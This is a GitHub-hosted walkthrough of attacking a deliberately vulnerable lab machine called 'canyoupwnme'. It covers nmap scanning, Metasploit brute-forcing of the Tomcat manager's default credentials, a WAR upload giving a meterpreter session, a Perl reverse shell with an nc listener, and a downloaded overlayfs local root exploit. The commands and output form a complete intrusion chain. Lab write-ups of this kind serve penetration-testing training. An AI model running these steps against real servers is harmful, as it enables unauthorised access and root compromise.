Skip to content
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
Cannot retrieve contributors at this time


Goal of this attack is to deploy a reverse shell on the target machine.

Port scanning to identify Tomcat

Let's scan the target machine (canyoupwnme) with nmap

$ nmap -A -T4 -sT -p1-65535 canyoupwnme
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

Check what is available

With your browser, open the URL


Seems that the Tomcat's management console is available, but authentication is needed. Metsasploit can help us...

Brute forcing the Tomcat's management console

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rhosts canyoupwnme
msf auxiliary(tomcat_mgr_login) > set rport 8080
msf auxiliary(tomcat_mgr_login) > exploit

[!] No active DB -- Credential data will not be saved!
[-] TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[+] - LOGIN SUCCESSFUL: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) > quit

Yep! Credentials tomcat:tomcat were found. Still using Metasploit, we can upload a crafted .WAR in order to have a meterpreter session.

Startin a meterpreter session

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > set username tomcat
msf exploit(tomcat_mgr_upload) > set password tomcat
msf exploit(tomcat_mgr_upload) > set rhost canyoupwnme
msf exploit(tomcat_mgr_upload) > set rport 8080
msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on
[*] canyoupwnme:8080 - Retrieving session ID and CSRF token...
[*] canyoupwnme:8080 - Uploading and deploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j...
[*] canyoupwnme:8080 - Executing Hv5hJD7sAuzbRX3UGWiOctD6yz3j...
[*] canyoupwnme:8080 - Undeploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j ...
[*] Sending stage (45741 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-04-18 13:33:40 +0200

meterpreter > shell
Process 1 created.
Channel 1 created.
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

Becoming root

On the attacker machine, download and configure a Perl reverse shell

$ wget
$ tar zxvf perl-reverse-shell-1.0.tar.gz
$ cd perl-reverse-shell-1.0
$ vim # set IP and PORT at lines 45 and 46

Once prepared, upload the reverse shell on the target machine using the meterpreter

meterpreter > upload /tmp/
[*] uploading  : -> /tmp/
[*] uploaded   : -> /tmp/

On the attacker machine, start listening

$ nc -nvp 9876
listening on [any] 9876 ...

while on the victim machine, execute the Perl script

meterpreter > shell
Process 2 created.
Channel 3 created.
perl /tmp/
Content-Length: 0
Connection: close
Content-Type: text/html

Content-Length: 43
Connection: close
Content-Type: text/html

Sent reverse shell to<p>

On the attacker machine you should see something like that

connect to [] from canyoupwnme.pentest [] 53929
 12:24:48 up 55 min,  0 users,  load average: 0.00, 0.01, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
/usr/sbin/apache: 0: can't access tty; job control turned off

Spawn a tty shell

$ python -c "import pty; pty.spawn('/bin/bash');"
tomcat7@canyoupwnme:/$  whoami
tomcat7@canyoupwnme:/$ id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

and try with the overlayfs local root exploit used with Redis

$ mkdir tmp
$ cd tmp
$ wget -O ofs.c
$ gcc ofs.c -o ofs.bin
$ ./ofs.bin
# id
# uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),115(lpadmin),1000(user)

Got it!